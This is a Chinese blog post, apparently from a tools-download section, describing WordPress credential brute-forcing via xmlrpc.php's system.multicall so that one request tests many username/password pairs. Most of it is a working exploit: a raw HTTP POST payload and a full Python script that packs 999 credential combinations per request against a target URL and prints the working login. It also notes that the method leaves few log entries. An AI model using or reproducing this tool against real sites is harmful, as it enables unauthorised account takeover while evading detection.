通过xmlrpc暴力破解wordpress(单请求多组帐户密码)含exp


Oct 15 2015

通过xmlrpc暴力破解wordpress(单请求多组帐户密码)含exp

首页 » 神器下载 » 通过xmlrpc暴力破解wordpress(单请求多组帐户密码)含exp   

利用xmlrpc.php来进行账号的暴力破解,原文:https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html

只是给出POC。

 

以往的文章都是一请求一组账号密码的。这个是一请求多组账号密码的。一个请求里加一千组账号密码没问题。日志里也就几条xmlrpc日志。点击查看原图

通过查看官方文档写成如下EXP


POST /wp/wordpress//xmlrpc.php HTTP/1.1
Host: weisuo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; c4bbage@weisuo.org)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1196

<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName> <params><param><value><array><data><value>
       <struct>
        <member>
         <name>methodName</name>
         <value><string>wp.getCategories</string></value>
        </member>
        <member>
         <name>params</name>
         <value>
          <array>
           <data>
            <value><string>1</string></value>
<value><string>c4bbage</string></value>
<value><string>11</string></value>
           </data>
          </array>
         </value>
        </member>
       </struct>
      </value>
      <value>
      <struct>
        <member>
         <name>methodName</name>
         <value><string>wp.getCategories</string></value>
        </member>
        <member>
         <name>params</name>
         <value>
          <array>
           <data>
            <value><string>1</string></value>
<value><string>c4bbage</string></value>
<value><string>123456zz</string></value>
           </data>
          </array>
         </value>
        </member>
       </struct>
      </value>
     </data>
    </array>
   </value>
  </param>
 </params>
</methodCall>

weibo:http://weibo.com/s4turnus 

#参考https://code.google.com/p/gi-torrent/wiki/system_multicall

 利用脚本

# coding=utf-8
# author:c4bbage@qq.com
# weibo:http://weibo.com/s4turnus

import requests
import httplib
import urlparse
import io
import argparse


def post(host, pl, port=80,  path='/xmlrpc.php'):
    postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0、c4bbage@weisuo", "X-Forwarded-For": host, 'Content-Type':
                'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive'}
    postcontent = '''<?xml version="1.0"?>
        <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>[pl]     </data>
        </array>   </value>    </param>    </params>    </methodCall>
        '''
    resultHtml = httplib.HTTPConnection(host.split(":")[0], port, False)
    resultHtml.request(
        'POST', path, body=postcontent.replace('[pl]', pl), headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect


def main():
    parser = argparse.ArgumentParser(
        description='wordpress brute force tool. This is a multi-group account password request. A request Riga one thousand group account password no problem. Xmlrpc will log a few logs.. \nby c4bbage http://weibo.com/s4turnus')

    parser.add_argument('-t',
                        action="store",
                        dest="url",
                        required=True,
                        help='exp: -t http://weisuo.org/xmlrpc.php'
                        )
    parser.add_argument('-u',
                        action="store",
                        dest="userfile",
                        required=True,
                        help='exp: -u username.txt',
                        type=argparse.FileType('r')
                        )
    parser.add_argument('-p',
                        action="store",
                        dest="pwdfile",
                        required=True,
                        help='exp: -p password.txt',
                        type=argparse.FileType('r')
                        )

    args = parser.parse_args()
    url = urlparse.urlparse(args.url)
    userfile = args.userfile
    pwdfile = args.pwdfile
    if(url.netloc.index(':') > 0):
        urlport = url.netloc.split(":")[1]
    else:
        urlport = 80
    # 每个请求999组账号密码
    t = 999
    users = userfile.readlines()
    pwds = pwdfile.readlines()
    pl = '''
    <value><struct><member>
        <name>methodName</name>
            <value><string>wp.getCategories</string></value>
            </member>
        <member>
        <name>params</name>
        <value><array><data>
            <value><string>1</string></value>
            <value><string>[username]</string></value>
            <value><string>[pwd]</string></value>
        </data></array></value>
    </member></struct></value>'''

    up = [[u.strip(), p.strip()] for u in users for p in pwds]
    i = 0
    apl = ''
    while i <= len(up) / t:
        apl = ''
        s = i * t
        for a in up[s:s + t]:
            apl += pl.replace('[username]', a[0]).replace('[pwd]', a[1])
            pass
        res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)
        #   提取结果
        if(res.find("categoryDescription") > 0):
            rr = 0
            for r in res.split("</struct></value>"):
                if(r.find("categoryDescription") > 0):
                    print up[s:s + t][rr] 
                    # 成功后退出
                    exit()
                    pass
                rr += 1
        i += 1
        pass

if __name__ == '__main__':
    main()

正文部分到此结束

文章标签: xmlrpc漏洞

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «如何在Ubuntu上安装Snort入侵检测系统 | php内网探测脚本&简单代理访问»

这篇文章还没有收到评论,赶紧来抢沙发吧~